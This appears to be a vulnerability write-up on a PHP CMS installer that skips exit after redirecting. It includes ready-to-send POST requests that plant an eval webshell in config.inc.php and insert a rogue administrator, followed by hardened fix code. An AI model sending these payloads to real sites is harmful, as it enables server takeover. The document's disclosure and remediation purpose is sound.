The problem lies in the /install/index.php file. After the application has been installed, an install.lock file is generated in the application's root directory, but /install/index.php gets the check for install.lock wrong.
<?php
if(file_exists("../install.lock"))
{
    header("Location: ../"); // no exit
}

//echo 'tst';exit;
require_once("init.php");
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
As can be seen, when install.lock exists the script only sends a 302 redirect via header() and does not exit, so all of the logic below still executes. This gives rise to at least two vulnerabilities.

1. getshell (very dangerous)
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
    $smarty->assign("step",1);
    $smarty->display("index.html");
}elseif($_REQUEST['step']==2)
{
    $mysql_host=trim($_POST['mysql_host']);
    $mysql_user=trim($_POST['mysql_user']);
    $mysql_pwd=trim($_POST['mysql_pwd']);
    $mysql_db=trim($_POST['mysql_db']);
    $tblpre=trim($_POST['tblpre']);
    $domain==trim($_POST['domain']); // as quoted: "==" compares instead of assigning, so $domain is never set here
    $str="<?php \r\n";
    $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
    $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
    $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
    $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
    $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
    $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
    $str.='define("DOMAIN","'.$domain.'");'."\r\n";
    $str.='define("SKINS","default");'."\r\n";
    $str.='?>';
    file_put_contents("../config/config.inc.php",$str); // writes the submitted data into a PHP file
The code above writes the POST data straight into ../config/config.inc.php, so submitting the following POST request yields a one-line webshell:
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.129/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 126

mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
This method is very dangerous, however: it overwrites the configuration and leaves the site unable to run.

2. Adding an administrator directly
elseif($_REQUEST['step']==5)
{
    if($_POST)
    {
        require_once("../config/config.inc.php");
        $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
        mysql_select_db(MYSQL_DB,$link);
        mysql_query("SET NAMES ".MYSQL_CHARSET );
        mysql_query("SET sql_mode=''");
        $adminname=trim($_POST['adminname']);
        $pwd1=trim($_POST['pwd1']);
        $pwd2=trim($_POST['pwd2']);
        if(empty($adminname))
        {
            echo "<script>alert('管理员不能为空');history.go(-1);</script>";
            exit();
        }
        if(($pwd1!=$pwd2) or empty($pwd1))
        {
            echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>"; // no exit here either
        }
        mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)"); // inserts an administrator directly
    }
With that, we can directly insert an administrator account qingshen/qingshen using the following request:
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.2cto.com /canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

adminname=qingshen&pwd1=qingshen&pwd2=qingshen
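As an added example that is not part of the original write-up or of the CMS itself, the following PHP shows how the three defects identified above (no exit after the redirect, raw interpolation of POST data into config.inc.php, and the fall-through admin insert) would be fixed. File paths, POST field names and constant names are taken from the quoted installer; the PDO handle and the buildConfig/createAdmin helpers are assumptions.

```php
<?php
// Added example (not the CMS's own code): hardened form of the installer spots
// discussed above. Assumes the same layout (../install.lock, ../config/config.inc.php)
// and the same POST field names as the quoted code.
declare(strict_types=1);

// 1. Gate: once install.lock exists, redirect AND stop. header() alone never
//    halts the script, so every later step would still be reachable.
if (file_exists(__DIR__ . '/../install.lock')) {
    header('Location: ../', true, 302);
    exit;
}

// 2. Config writer: emit each value with var_export(), which yields a properly
//    quoted PHP string literal, so a value like  test");@eval(...);?>//  is only
//    ever string data and can never close the define() call.
function buildConfig(array $post): string
{
    $map = ['MYSQL_HOST' => 'mysql_host', 'MYSQL_USER' => 'mysql_user',
            'MYSQL_PWD'  => 'mysql_pwd',  'MYSQL_DB'   => 'mysql_db',
            'TABLE_PRE'  => 'tblpre',     'DOMAIN'     => 'domain'];
    $out = "<?php\n";
    foreach ($map as $const => $field) {
        $value = trim((string) ($post[$field] ?? ''));
        // TABLE_PRE is concatenated into SQL later, so allow identifier characters only.
        if ($const === 'TABLE_PRE' && !preg_match('/^[A-Za-z0-9_]{0,32}$/', $value)) {
            throw new InvalidArgumentException('invalid table prefix');
        }
        $out .= sprintf("define(%s, %s);\n", var_export($const, true), var_export($value, true));
    }
    $out .= "define('MYSQL_CHARSET', 'GBK');\ndefine('SKINS', 'default');\n";
    return $out; // no closing "?>" tag, so nothing can be appended as PHP code
}

// 3. Admin creation: exit on validation failure instead of falling through, and
//    bind the values instead of interpolating them into the INSERT statement.
//    $tblpre is assumed to have passed the TABLE_PRE check in buildConfig().
function createAdmin(PDO $db, string $tblpre, array $post): void
{
    $name = trim((string) ($post['adminname'] ?? ''));
    $pwd1 = (string) ($post['pwd1'] ?? '');
    $pwd2 = (string) ($post['pwd2'] ?? '');
    if ($name === '' || $pwd1 === '' || !hash_equals($pwd1, $pwd2)) {
        http_response_code(400);
        exit('invalid administrator name or password'); // stop here, do not insert
    }
    $stmt = $db->prepare("INSERT INTO {$tblpre}admin (adminname, password, isfounder) VALUES (?, ?, 1)");
    $stmt->execute([$name, password_hash($pwd1, PASSWORD_DEFAULT)]);
}
```

Even with these fixes the installer directory should be removed once installation is complete; a reachable installer that honours step parameters after install.lock exists is the root cause of both issues above.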